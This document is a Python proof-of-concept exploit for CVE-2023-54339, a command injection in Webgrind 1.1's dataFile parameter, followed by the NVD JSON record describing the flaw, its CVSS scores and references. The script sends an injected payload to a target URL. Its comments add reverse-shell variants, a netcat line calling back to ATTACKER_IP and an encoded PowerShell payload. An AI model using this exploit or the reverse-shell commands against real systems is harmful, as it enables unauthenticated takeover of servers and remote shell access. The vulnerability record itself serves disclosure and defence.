CVE-2023-54339

import requests import urllib.parse # CVE-2023-54339 PoC - Webgrind RCE via dataFile parameter # Target: Webgrind 1.1 (Xdebug Profiling Visualization Tool) # Vulnerability: Remote Command Execution via dataFile parameter in index.php target_url = "http://target.com/webgrind/index.php" # Basic RCE test - execute calc.exe on Windows (as mentioned in description) payload = "0'%26calc.exe%26'" encoded_payload = urllib.parse.quote(payload) params = { 'dataFile': encoded_payload } print(f"[*] Sending exploit to {target_url}") print(f"[*] Payload: {payload}") try: response = requests.get(target_url, params=params, timeout=10) print(f"[+] Request sent. Status code: {response.status_code}") # For reverse shell, use a more sophisticated payload: # Linux: 0';nc -e /bin/bash ATTACKER_IP 4444 # # Windows: 0%27%26powershell -e BASE64_ENCODED_PAYLOAD%26%27 except requests.exceptions.RequestException as e: print(f"[-] Error: {e}")

{"cve": {"id": "CVE-2023-54339", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:16:01.780", "lastModified": "2026-02-03T19:21:26.087", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Webgrind 1.1 contains a remote command execution vulnerability that allows unauthenticated attackers to inject OS commands via the dataFile parameter in index.php. Attackers can execute arbitrary system commands by manipulating the dataFile parameter, such as using payload '0%27%26calc.exe%26%27' to execute commands on the target system."}, {"lang": "es", "value": "Webgrind 1.1 contiene una vulnerabilidad de ejecución remota de comandos que permite a atacantes no autenticados inyectar comandos del sistema operativo a través del parámetro dataFile en index.PHP. Los atacantes pueden ejecutar comandos de sistema arbitrarios manipulando el parámetro dataFile, como usar la carga útil '0%27%26calc.exe%26%27' para ejecutar comandos en el sistema objetivo."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:webgrind_project:webgrind:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.1", "matchCriteriaId": "97D0C87F-9C01-457D-8DFC-FC6A8AB80966"}]}]}], "references": [{"url": "http://github.com/jokkedk/webgrind/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/51074", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://www.vulncheck.com/advisories/webgrind-remote-command-execution-rce-via-datafile-parameter", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/51074", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit"]}]}}